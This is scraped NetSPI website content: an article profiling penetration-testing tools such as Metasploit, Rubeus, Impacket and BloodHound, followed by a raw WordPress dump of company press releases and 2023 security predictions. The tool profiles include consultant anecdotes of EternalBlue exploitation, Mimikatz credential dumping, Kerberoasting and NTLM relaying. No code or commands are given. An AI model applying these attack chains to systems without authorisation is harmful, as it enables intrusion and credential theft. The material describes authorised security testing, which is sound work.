Dev Tools allow penetration testers to view and manipulate all client-side scripts, cookies, and other web elements. It can also come in handy when looking for hidden fields and other potentially sensitive data. It’s ability to inspect and manipulate the contents of a given web page within the context of a browser makes it a great resource for anything from debugging to viewing network traffic without an available intercepting proxy.
“Some applications insecurely configure user permissions on the client-side. In cases like this, an attacker can modify client-side code to elevate their permissions in the application.”
The Metasploit exploitation framework provides all the functionality a pentester might need, including scanning networks and targets, launching exploits, receiving shells, and even performing post-exploitation. With its open-source nature and constantly evolving feature set, Metasploit is a top penetration testing tool because it allows testers to leverage exploits to demonstrate the full impact of security vulnerabilities.
NetSPI Security Consultant James Maguire used Metasploit to compromise a windows domain and demonstrate the risks of missing security patches and password reuse to the client.
He shared, “Using Metasploit, I scanned the network for hosts missing the infamous MS17-010 (EternalBlue) patch.” He found three servers missing the patch, picked one, and launched the exploit using Metasploit. According to James, “The exploit was successful, and I got a Meterpreter shell. Meterpreter is a special attack payload available to Metasploit users and has several useful post-exploitation features and modules. I used one of my favorite modules (Mimikatz) to recover cleartext credentials from the victim server.” While reviewing the credentials, he discovered one of the accounts had domain admin privileges, and with that, he was able to deliver valuable penetration test results with ease.
“I was able to use Metasploit to compromise a windows domain and demonstrate the risks of missing security patches and password reuse to the client.”
SQLmap is an open-source project that tests for SQL injection vulnerabilities in web application requests. If found, it will also identify the type and location of the injection. It provides testers with an easy-to-use tool to interact with the vulnerability to enumerate data from the application's database.
SQLmap is a favorite among NetSPI’s consultants because SQL injection can be a very tedious finding to verify and determine its impact. SQLmap speeds up that process, thereby speeding up reporting.
NetSPI Security Consultant II Josiah Kohlmeyer explains, “When we find a SQL injection vulnerability, one of the ways to verify the finding is by enumerating the database version or database name. If the database name was ‘dev-database’, manually enumerating that requires us to hand-write SQL statements to brute-force determine each letter of the name one letter at a time.” When using SQLmap, pentesters can supply SQLmap the command "--current-db" and the tool will complete the enumeration and provide a database name in 30-60 seconds instead of the 15-30 minutes it would take to do manually.
“I've found SQL injection on several web application assessments, and I've always used SQLmap to verify the finding. Clients are always surprised to see I have information that should only be internally known.”
Known as the “C# toolset for raw Kerberos interaction and abuses,” Rubeus made the cut for its flexibility and power in Kerberos abuse.
Released in 2018, Rubeus allows for Kerberos interaction and abuse due to misconfigurations of Active Directory objects. It allows an attacker to request valid Ticket Granting Tickets (TGT) and Ticket Granting Services (TGS) for accounts configured with an SPN, and inject those Kerberos tickets into memory, processes, or to a file to authenticate on the domain.
NetSPI consultants have leveraged Rubeus to execute Kerberoasting, ASREProasting, pass-the-ticket, pass-the-hash, golden ticket, silver ticket, and diamond ticket attacks.
“Rubeus implements almost all of the known Kerberos attacks and is extremely flexible in how it works. There is no ONE thing out there that could replace Rubeus if it was somehow removed from history.”
- Derek Wilson, Senior Security Consultant
“After guessing a weak user account password, I used Rubeus to request all domain user account hashes with a Service Principal Name configured with RC4 encryption. I sent the hashes to a password cracker and cracked a domain admin password.”
Developed by NetSPI's very own VP of Research Karl Fosaaen, MicroBurst is a PowerShell toolkit that allows for various attacks on Azure Services.
It houses all the attack automation scripts useful in Azure Cloud Pentesting and includes functions for anonymous enumeration, authenticated attacks, auditing configurations, and performing post-exploitation actions.
The information gathering tools are especially useful, and the password dumping function "Get-AzPasswords" has proven to be a crucial component of many successful exploitation campaigns to dump Key Vaults, Automation Accounts, and other credentials to escalate privileges in an Azure subscription.
In this webinar, Karl leverages Get-AzPasswords to automate the collection of passwords stored in Azure. Additionally, MicroBurst can also be used for Azure subdomain enumeration as seen in this demo by Day Johnson.
Bonus Tools: Visit our repository of NetSPI-developed open source tools.
BloodHound allows you to scan an Active Directory (AD) domain and display privilege escalation and lateral movement paths in a graph. This is incredibly useful for blue and red teams to discover and block these attack paths.
It provides a visual map of the AD environment which makes it easier to identify relationships between objects and discover attack paths.
NetSPI Senior Security Consultant Sam Bogart found that a client had unintentionally granted the "Domain Users" group high privileges by directly modifying the domain ACL. Another client had one computer on the domain where "Domain Users" were in the administrator’s group and a Domain Admin was logged in.
In both examples, Sam used BloodHound to display these paths for privilege escalation and provide a full attack path from a compromised account to "Domain Admin."
“I was on a test with a network that was pretty hardened: no missing patches and no man-in-the-middle opportunities. It was looking pretty grim. But thanks to BloodHound, I was able to find a misconfigured DACL that allowed me to escalate from a standard Domain User to Domain Admin in two steps.”
- Cameron Geehr, Managing Consultant
“BloodHound offers unrivaled insight into Active Directory misconfigurations that could lead to lateral movement and privilege escalation.”
SAML Raider is a Burp Suite extension for testing SAML infrastructures.
It contains two core features: a SAML message editor to manipulate SAML messages and an X.509 certificate manager. Our security consultants find value in SAML Raider because of the ease at which it allows you to read the SAML message and manipulate it for an attack – specifically for XML signature wrapping attacks and XML external entity injection attacks.
Every time NetSPI Senior Security Consultant Aussan Saad-Ali sees SAML authentication he checks with SAML Raider to see if a XSW or XXE attack is possible. Check out this how to article to learn how to accomplish this.
“The ease that it allows you to read the SAML message and manipulate it for an attack makes it valuable to me, especially how it facilitates the different type of attack scenarios such as XML signature wrapping attack and XML external entity injection attack.”
Impacket is a collection of modules (known as Python classes) primarily used by developers when working on network protocols.
It can be used during all phases of network penetration testing. Impacket performs a wide range of activities with its more than 50 features – from exploiting known vulnerabilities to carrying out Man in the Middle (MiTM) attacks and and fetching Windows secrets.
“During one of my projects, I was able to capture NTLMv2 hashes on the internal network. It was not possible to crack the hashes to get the password, so I used Impacket ntlmrelayx.py and was able to relay them to get local admin access to the workstation.”
– Ruchit Patel, Senior Security Consultant
Which tools are you or your team using to uncover security flaws?
These 12 tools will help increase pentest efficiency and identify unique attack paths – ultimately to ensure more thorough security testing and support faster remediation.
Looking for a resourceful team to pentest your applications, networks, cloud platforms, IoT devices, blockchain implementations, and beyond? Explore NetSPI’s full suite of penetration testing services.
A special thank you to everyone who participated in this article:
Amidst a year of record growth and momentum, NetSPI is recognized again for its leadership and culture.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, has been named one of the top workplaces in the U.S. by Energage, a leading provider of technology-based employee engagement tools. Winners are chosen based on an anonymous third-party employee survey that measures several aspects of workplace culture, including alignment, execution, and connection.
“We’re proud to be recognized as a top workplace for the second year in a row,” said Aaron Shilts, CEO of NetSPI. “Every employee has contributed to our record growth this year, continuing to drive results as we expand. Our strong culture remains key to what makes NetSPI a great place to work.”
This Top Workplace recognition follows a year of record growth and momentum for the company including the hiring of more than 230 people, and promotion of over 170 employees, namely Norman Kromberg to CISO. This, in addition to a number of new product innovations, led to a 58% organic revenue growth throughout the fiscal year.
“In a year of record growth, we’re particularly proud of the growth amongst NetSPI employees,” said Heather Crosley, Vice President of People Operations at NetSPI. “Our employees continue to be committed to collaboration, and creating a culture of excellence and belonging.”
Top Workplaces USA celebrates organizations with 150 or more employees that have built great cultures. While more than 42,000 organizations were invited to participate, just over 1,200 organizations have been honored with the Top Workplaces USA award this year.
For more information about joining NetSPI's growing team, please visit www.netspi.com.
About NetSPI
NetSPI is the leader in enterprise penetration testing and attack surface management. Today, NetSPI offers the most comprehensive suite of offensive security solutions – penetration testing as a service, attack surface management, and breach and attack simulation. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world's most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers and e-commerce companies, and 50 percent of the Fortune® 50. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India. Follow NetSPI on Facebook, Twitter, and LinkedIn.
About Energage
Making the world a better place to work together.™
Energage is a purpose-driven company that helps organizations turn employee feedback into useful business intelligence and credible employer recognition through Top Workplaces. Built on 14 years of culture research and the results from 23 million employees surveyed across more than 70, 000 organizations, Energage delivers the most accurate competitive benchmark available. With access to a unique combination of patented analytic tools and expert guidance, Energage customers lead the competition with an engaged workforce and an opportunity to gain recognition for their people-first approach to culture. For more information or to nominate your organization, visit Energage or Workplaces.
[post_title] => Energage Names NetSPI a Top Workplaces USA Winner for Second Consecutive Year
[post_excerpt] => Read why NetSPI was honored as a Top Workplaces USA by Energage for the second consecutive year.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => top-workplaces-usa-2023
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-31 15:03:23
[post_modified_gmt] => 2023-01-31 21:03:23
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29291
[menu_order] => 27
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[11] => WP_Post Object
(
[ID] => 29219
[post_author] => 91
[post_date] => 2023-01-25 07:00:00
[post_date_gmt] => 2023-01-25 13:00:00
[post_content] =>
Following momentous year of global expansion and technology advancements, offensive security leader announces innovation group and strategic appointments.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced a record fiscal year, achieving 58% organic revenue growth in 2022. The growth is attributed to the company’s strategic expansion into Europe, Middle East, and Africa (EMEA), and an enhanced portfolio of offensive security offerings.
In 2022, NetSPI launched its Attack Surface Management (ASM) platform and blockchain penetration testing solutions, and made significant updates to its Breach and Attack Simulation (BAS) services, further solidifying the company as a market leader. During the banner year, NetSPI added more than 300 new clients to its roster, which includes nine of the top 10 U.S. banks, three FAANG companies, top cloud providers, four of the five largest healthcare companies, and several Fortune 500 brands.
To support the company’s growth, NetSPI also hired more than 230 employees, some of which were trained through its NetSPI University program, and promoted over 170 staff members, addressing the industry’s talent gap head-on. The company’s commitment to career development is one of many reasons why it was honored in the 2022 Top Workplaces USA, Top 200 Workplaces in Minnesota, and Cultural Excellence awards.
“Over the past year, NetSPI has challenged the status quo in the cybersecurity market, pushing the envelope to deliver new, enhanced, continuous offensive security solutions – and the industry has taken note,” said Aaron Shilts, CEO of NetSPI. “As we forge ahead in 2023, our team will continue to innovate to improve the security posture of organizations worldwide, powered by our customer-first approach to security.”
Introducing NetSPI Labs, an Innovation Incubator for the Security Community
Building on its recent momentum, NetSPI has formalized NetSPI Labs, a dedicated innovation group designed to deliver industry research to the security community and develop new solutions for the cybersecurity and vulnerability management challenges organizations face.
NetSPI has appointed three Vice Presidents of Research, Karl Fosaaen, Nick Landers, and Scott Sutherland, to lead NetSPI Labs. They bring decades of experience in security testing, product and service line development, and adversarial research.
“NetSPI Labs is a game-changer for the industry. This innovation engine will enhance cross team collaboration to identify the white space in offensive security, and how NetSPI can best deliver on unmet needs,” said Charles Horton, Chief Operating Officer at NetSPI. “The team will share resources and research with the security community, furthering industry collaboration to stay one step ahead of adversaries.”
NetSPI Appoints Norman Kromberg as Chief Information Security Officer
NetSPI also announced the appointment of Norman Kromberg as its Chief Information Security Officer (CISO). In this role, he will oversee the company’s security operations and architecture.
Kromberg brings more than 30 years of experience in cybersecurity, information assurance, risk management, and software quality and compliance, previously holding security leadership positions at companies such as SouthernCarlson, Optiv, and ACI Worldwide. He also brings knowledge of the company’s business processes from his prior role as a Managing Director at NetSPI.
“It is a pivotal time for NetSPI, as the company continues its rapid growth and innovates at accelerated speeds,” said Kromberg. “Security is paramount to NetSPI; it is in its DNA. This role further showcases the company’s commitment to staying ahead of bad actors and securing our clients. I’m excited for this next chapter with the company.”
For more information about NetSPI or to join NetSPI’s growing team, please visit www.netspi.com.
About NetSPI
NetSPI is the leader in enterprise penetration testing and attack surface management. Today, NetSPI offers the most comprehensive suite of offensive security solutions – penetration testing as a service, attack surface management, and breach and attack simulation. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers and e-commerce companies, and 50 percent of the Fortune® top 50. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India. Follow NetSPI on Facebook, Twitter, and LinkedIn.
[post_title] => NetSPI Achieves 58% Organic Revenue Growth in 2022, Unveils Initiative to Accelerate Offensive Security Innovation
[post_excerpt] => Read about NetSPI's momentous year of global expansion and technology advancements, explore the NetSPI Labs innovation group, and meet the company’s new CISO.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => 2022-growth-offensive-security-innovation
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-27 14:27:23
[post_modified_gmt] => 2023-01-27 20:27:23
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29219
[menu_order] => 30
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[12] => WP_Post Object
(
[ID] => 29159
[post_author] => 91
[post_date] => 2023-01-10 06:04:00
[post_date_gmt] => 2023-01-10 12:04:00
[post_content] =>
nVisium’s cloud and application security experts join NetSPI to support, scale, and deliver the most comprehensive suite of offensive security solutions.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the acquisition of nVisium to further scale its offensive security solutions and address heightened demand for human-delivered penetration testing. nVisium will support NetSPI’s continued efforts to deliver strategic security testing solutions to enterprises.
nVisium is an authority in security testing, with an impressive track record of delivering cloud and application pentesting to Fortune 500 companies and well-known brands such as Carfax, 1Password, Bluescape, Deltek, EAB, and Trimble.
With the acquisition, NetSPI now has over 450 offensive security experts globally who can support and scale to meet the needs of current and future clients.
“Our decision to acquire nVisium comes down to one core factor: acquiring amazing talent,” said Aaron Shilts, CEO at NetSPI. “We’re bringing two brilliant, culturally-aligned, and complementary offensive security teams together who are committed to delivering the highest standard of penetration testing on the market today. I’m excited to see what nVisium and NetSPI can accomplish together.”
NetSPI welcomes Jack Mannino, CEO and founder of nVisium, to its senior leadership team. He founded nVisium in 2009 on the foundation of inventing new and more efficient ways of protecting software and scaling secure development in the software development lifecycle (SDLC).
“NetSPI’s market leadership and people-first culture are a natural complement to what we’ve built at nVisium. We’re all-in on the mission to help organizations keep pace with their ever-evolving attack surface,” added Jack. “By joining forces with NetSPI, we have a massive opportunity to expand the breadth and depth of solutions we deliver, improve the client experience, and introduce new growth opportunities to our employees.”
NetSPI is the leader in enterprise penetration testing and attack surface management. Today, NetSPI offers the most comprehensive suite of offensive security solutions – attack surface management, penetration testing as a service, and breach and attack simulation. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, three of the five largest healthcare companies, the leading cloud providers, and many of the Fortune® 500. NetSPI, a KKR and Ten Eleven Ventures portfolio company, is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India. Follow NetSPI on Facebook, Twitter, and LinkedIn.
About nVisium
nVisium empowers organizations to eliminate security vulnerabilities through proven in-depth assessments, remediation, and training programs. Our experienced team of security-savvy engineers help organizations establish best practices with high ROI for their engineering and development lifecycles. Through services, software solutions, and R&D, nVisium provides security support for applications, operating systems, networks, mobile, cloud, and IoT unique to business operations, compliance initiatives, and more. Additionally, nVisium offers instructor-led and online security training. Privately owned and founded in 2009, nVisium is headquartered in Falls Church, VA, and names Fortune 500 companies and household brands as customers.
[post_title] => NetSPI Acquires nVisium, Bringing Top Penetration Testing Talent Together
[post_excerpt] => nVisium’s cloud and application security experts join NetSPI to support, scale, and deliver the most comprehensive suite of offensive security solutions. Learn how to work with the combined organization.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-acquires-nvisium
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:09:56
[post_modified_gmt] => 2023-01-23 21:09:56
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29159
[menu_order] => 39
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[13] => WP_Post Object
(
[ID] => 29047
[post_author] => 91
[post_date] => 2022-12-20 09:00:00
[post_date_gmt] => 2022-12-20 15:00:00
[post_content] =>
As 2022 comes to a close, it’s clear that this has been a restless year for both threat actors and cybersecurity professionals.
The year started off with a bang as the industry worked around the clock to detect and patch the Log4j vulnerabilities following a mid-holiday disclosure. The cyber sector remained in a perpetual busy season as new technologies like cryptocurrency wallets were hacked, non-profit organizations and health insurance providers suffered data breaches, and entire government systems experienced ransomware attacks – not to mention the prevalence of Russian cyberwarfare which signaled the need for heightened security across the globe.
But for every hack, data breach, and ransomware attack that occurred, there were thousands prevented by global cybersecurity practitioners. There’s a lot of innovation and collaboration to celebrate as we turn the page to 2023.
As we enter the new year, we asked our global team to chime in on the trends they anticipate. From machine learning and software supply chain attacks to the cybersecurity shortage and cyber insurance, our team sees big things ahead.
There will be an emphasis on machine learning security, threats, and vulnerabilities.
“Machine learning (ML) is already deployed in numerous technologies, especially those concerned with security — for example email filters, security information and event management (SIEM) dashboards, and endpoint detection and response (EDR) products. If you thought you could delay ML security conversations, think again. There is a growing group of security researchers focused on Adversarial ML, which includes both attacks on models themselves (inversion, extraction, cloning, etc.) and the use of ML in network attacks and social engineering.
In the upcoming year, we'll see a growing list of vulnerabilities being published for ML-integrated systems. Additionally, we'll see a large amount of research focused on evading classification models to improve attacker success rates as well as some of the first notable "model duplication" incidents — where one entity is accused of cloning a model or attackers release "cloned models" of sensitive classifiers and advanced prediction engines. Privacy is often overlooked when thinking about model training, but data cannot be completely anonymized without destroying its value to ML. In other words, models already contain swaths of private data that might be extracted as part of an attack. While many companies claim to have ‘private enterprise models’, I suspect we'll begin seeing data breaches from model extraction research.” — Nick Landers, VP of Research, NetSPI
Distributed Ledger Technology (DLT) will help mitigate software supply chain attacks.
“Over the last few years, there have been several ‘supply chain compromises' that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying 3rd party software in their environment. However, neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. As a result, we expect to see software supply chain attacks continue into 2023 and we need a solution.
This is where distributed ledger technology (DLT) comes in. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DTL can be used anytime you need a high integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). DLT could be a real asset in stopping supply chain attacks and though the adoption of DTL is still in its infancy, we’ll see some interesting use cases gain momentum in 2023.” — Scott Sutherland, VP of Research, NetSPI
The way organizations approach pentesting will become more continuous.
“The perimeter is essentially dead, so the way organizations approach pentesting has to evolve. The attack surface has become more fluid so you have to be able to scan for new assets and entry points continuously. In 2023, organizations will combine traditional pentesting, which in many cases will still be required for regulatory needs, with the proactive approach of a continual assessment of their attack surface. The result will be better awareness of the attack surface and more comprehensive traditional pentesting as there is more information about the true attack surface.” — Chad Peterson, Managing Director, NetSPI
Cyber insurance will become a leading driver for investment in security.
“Cyber insurance will become a leading driver for investment in security and IT controls. Carriers and brokers will continue to increase underwriting requirements with the goal of not paying out on claims. The challenge for CISOs, CROs, CIOs, CFOs and Board of Directors is that the carriers will use requirements focused on avoiding claims meaning another “compliance” requirement on top of the existing ones. While there may be evolution to acceptance of SOC 2, NIST, ISO and other certifications, the expense will be there for years.” — Norman Kromberg, Managing Director, NetSPI
By the end of next year every major financial institution will have announced adoption of blockchain technology.
“There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains.
By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven’t already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts. Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was “secure by default”, think again. Just like cloud platform adoption, the promises of “secure by default” will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech.” — Nick Landers, VP of Research, NetSPI
We will see industry aligned compliance regulations with real penalties.
“Regulations will continue to evolve and become more prescriptive. Regulations need to be much more mature, stringent, and punitive. Organizations must be held accountable for their inaction in the area of cybersecurity. For far too long organizations have not taken cybersecurity seriously enough. No longer is it okay for an organization to act as though it wasn't their fault or that they weren’t culpable for a breach that occurred. At the very least regulations must hold organizations accountable for the implementation of “Minimum Necessary” cybersecurity controls with heavy penalties for non-compliance. Organizations will be held accountable for basic cybersecurity hygiene. If an organization is unable to meet the most basic standards, a regulator will require a third-party to take over Cybersecurity Program execution (and the organization will be mandated to cover the associated costs). Like the FDA, we will start seeing industry aligned compliance regulations with real penalties that will force compliance and organizational change. The key will be enforcement and penalties.” — Ron Kuriscak, Managing Director, NetSPI
Training programs will have even more emphasis placed on them to narrow the employment gap.
“2023 will continue to be a jobseeker’s market as many organizations continue to hire cybersecurity talent. With the current cybersecurity shortage demand continues to outweigh supply. Cybercrime magazine predicts that there will still be 3.5 million cyber openings come 2025 — a staggering number to think about, but it’s not changing anytime soon. Training programs, like NetSPI University, will have even more emphasis placed on them to narrow that employment gap. NetSPI U has contributed to the scaling of our consulting team immensely (100+ hires through NetSPI U since 2018). If other organizations can figure out how to hire for team/culture fit and train cybersecurity specific skills through similar programs, the talent gap will continue to lessen. Additionally, in-depth but quick interview processes have become instrumental in hiring top talent before the competition — gone are the days of a drawn-out interview process as candidates are on and off the market extremely fast.” — Heather Crosley, VP People Operations, NetSPI
We expect to see an increase in cloud-agnostic application designs – and corresponding configuration and application vulnerabilities.
“Almost every company we work with is building in the cloud or in the process of migrating to it. While companies may dabble in many cloud platforms, they deploy the vast majority of their infrastructure in one primary platform. As part of that effort, many companies have built their applications using cloud-native, platform-specific technologies. For many companies, that initial transition to the cloud provides them with new performance benefits and the ability to truly scale applications and/or services for the first time. However, the downside to this is that after they've spent all of those R&D dollars on their initial deployments, they may want to move their applications and/or services to another cloud platform (for a variety of reasons, including cost) but they can't pivot without a herculean effort (and additional cost). To avoid this problem in the future many companies are investing dev dollars into cloud-agnostic application designs, which tend to rely on both Kubernetes and containers like Docker. Changing our collective mindset about the "right way" to build and deploy applications in that direction introduces a whole new set of configuration and application vulnerabilities that many companies are not prepared to address. Given the trends from previous years, we expect to see some growth in products and services in that space over the next year.” — Karl Fosaaen, VP of Research, NetSPI
The breach and attack simulation market is in the midst of its evolution.
“The Breach and Attack Simulation (BAS) market is in the middle of its evolution, and we can expect to see some useful incremental improvements as we turn the page on the year. At a high level, customers really value a human component but many BAS solutions in the market don’t offer that today. This will lead to service companies growing in the product space and products moving toward the services space. As a result, most security companies will need to provide a hybrid of technology-enabled services just to stay competitive in the next few years.
However, to meet customer demand in 2023, more BAS platforms will offer robust modules to simulate flexible command and control, email stack, and native cloud platform attack procedures, as well as the ability to create or customize modules in a meaningful way. Additionally, we’ll see an increase in streamlined product deployments (most likely in the form of SaaS-based offerings) and integrations, as well as improvements in validation inconsistencies and an increase in BAS solutions that offer meaningful data insights.
To reduce the costs needed for configurations, we’ll see more BAS companies working to streamline their product deployments to help reduce the overhead on their customers. We’ll also see innovations created to help streamline the integration process and limit the need for customization. It is also a challenge to verify that every attack module run by a BAS platform was delivered, executed, and completed successfully. However, it’s even harder to accurately determine if the action was blocked (and by what), determine if an alert was generated, and verify the alert triggered the creation of a proper response ticket. Which is why this year, I believe we’ll see strides made to improve validation inconsistencies. Finally, we’ll see an increase in BAS solutions in the market that offer meaningful data insights to allow companies to track the detection coverage over time.” — Scott Sutherland, VP of Research, NetSPI
The cybersecurity industry will certainly be thrown curveballs in 2023 but keeping an eye on these nine trends may just help you stay one step ahead of adversaries and inevitable change. For additional research and insights from Team NetSPI, visit https://www.netspi.com/pentesting-team/.
Patrick successfully bypassed Mimecast URL and file inspection features and worked with the email security company to remediate the issues.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced that Principal Security Consultant Patrick Sayler was recognized on Mimecast’s Security Researcher Wall of Fame for bypassing email defenses within Mimecast Targeted Threat Protection (TTP).
Patrick was able to bypass the URL and file inspection features which could have allowed an adversary to serve a malicious file or URL after Mimecast had already deemed it secure. A full breakdown of the process and remediation steps taken can be found on the NetSPI technical blog.
Patrick uncovered the vulnerability during a hybrid breach and attack simulation and social engineering penetration testing engagement for one of its clients. He worked closely with the Mimecast Responsible Disclosure Team to remediate the core issues identified within the TTP platform:
The file content was not served by Mimecast (Mimecast has committed to implementing a fix)
File inspection followed a predictable pattern (This issue has been addressed)
Results were stored by filename and shared (Addressed via risk-based caching on a continuous basis)
“This is a great reminder of the vital importance of defense in depth,” said Patrick. “When a frontline technical control fails, do you have back up, layered defenses and policies in place to slow down adversaries and prevent incident escalation? Social engineering and breach and attack simulation assessments can help organizations answer this question with confidence.”
NetSPI is the leader in enterprise penetration testing and attack surface management. Today, NetSPI offers the most comprehensive suite of offensive security solutions – attack surface management, penetration testing as a service, and breach and attack simulation. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, three of the five largest healthcare companies, the leading cloud providers, and many of the Fortune® 500. NetSPI, a KKR and Ten Eleven Ventures portfolio company, is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India. Follow NetSPI on Facebook, Twitter, and LinkedIn.
[post_title] => NetSPI’s Patrick Sayler Earns Spot on Mimecast’s Security Researcher Wall of Fame for Email Defense Evasion
[post_excerpt] => Explore how Patrick successfully bypassed Mimecast URL and file inspection features and worked with the email security company to remediate the issues.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => mimecast-email-defense-evasion
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:05
[post_modified_gmt] => 2023-01-23 21:10:05
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=28670
[menu_order] => 59
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[15] => WP_Post Object
(
[ID] => 28522
[post_author] => 91
[post_date] => 2022-10-10 08:10:00
[post_date_gmt] => 2022-10-10 13:10:00
[post_content] =>
The penetration testing company will help enterprises leveraging or exploring blockchain uncover the security weaknesses in their deployments.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced its new deployment-inclusive blockchain penetration testing service. The company will provide a comprehensive, full-spectrum evaluation of blockchain-based deployments to enterprises by utilizing its decades of penetration testing expertise, coupled with its understanding of the architecture's unique security concerns.
Its blockchain penetration testing services will evaluate all deployment models, including private, permissioned, consortia, and public, and various distributed ledger technologies including ConsenSys Codefi, R3 Corda, Hyperledger Fabric, custodial platforms and public chains, and more.
“Blockchain’s biggest innovations are below the surface,” according to the Forbes Blockchain 50 2022. The world’s largest organizations are now using distributed ledger technology to manage daily operations, from verifying insurance claims to tracking auto parts in the supply chain. Organizations are recognizing the scalability, competitive advantages, and revenue opportunities it presents.
“As adoption skyrockets, technology and security teams will need to quickly develop their blockchain acumen to support and protect these solutions – this begins with identifying and addressing people, process, and technology gaps,” said Travis Hoyt, Chief Technology Officer at NetSPI. “Our new blockchain penetration testing service line demonstrates NetSPI’s commitment to be relentlessly future focused, so our customers can be too.”
Enterprises currently leveraging or evaluating the potential of blockchain can partner with NetSPI to improve the security of their deployments.
To learn more about NetSPI’s blockchain penetration testing services, visit www.netspi.com or contact us.
About NetSPI
NetSPI is the leader in enterprise penetration testing and attack surface management. Today, NetSPI offers the most comprehensive suite of offensive security solutions – attack surface management, penetration testing as a service, and breach and attack simulation. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, three of the five largest healthcare companies, the leading cloud providers, and many of the Fortune® 500. NetSPI, a KKR and Ten Eleven Ventures portfolio company, is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India. Follow NetSPI on Facebook, Twitter, and LinkedIn.
On October 5, NetSPI was featured in the Channel Future article called KKR Ups Investment in NetSPI with $410 Million in New Funding. Read the preview below or view it online.
+ + +
Global investment firm KKR is providing $410 million in new funding to NetSPI, a provider of enterprise penetration testing and attack surface management.
KKR is increasing its investment in NetSPI with the funding. It initially invested in NetSPI in May 2021.
The funding recapitalizes NetSPI’s first institutional investor Sunstone Partners. The transaction will close by the end of 2022, subject to customary regulatory approvals.
Lauren Gimmillaro is NetSPI’s vice president of business development and strategic alliances.
“The investment from KKR will be used to continue innovating and expanding our technology portfolio, to expand globally, and to increase the talent at NetSPI,” she said. “We launched the NetSPI Partner Program earlier this year. So this funding will help us grow our channel team, ranging from channel development managers to those who can train partners in enablement, and much more. With this investment, we can double down on growth and expansion. And an important piece of that plan is the channel.”
Enterprises use NetSPI’s suite of offensive security solutions to uncover critical security gaps, minimize risk and reduce the likelihood of a security incident. The suite includes attack surface management, penetration testing as a service (PTaaS), and breach and attack simulation.
[post_title] => Channel Futures: KKR Ups Investment in NetSPI with $410 Million in New Funding
[post_excerpt] => NetSPI was featured in the Channel Future article called KKR Ups Investment in NetSPI with $410 Million in New Funding.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => channel-futures-kkr-ups-investment-in-netspi
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:11
[post_modified_gmt] => 2023-01-23 21:10:11
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=28554
[menu_order] => 76
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[17] => WP_Post Object
(
[ID] => 28559
[post_author] => 91
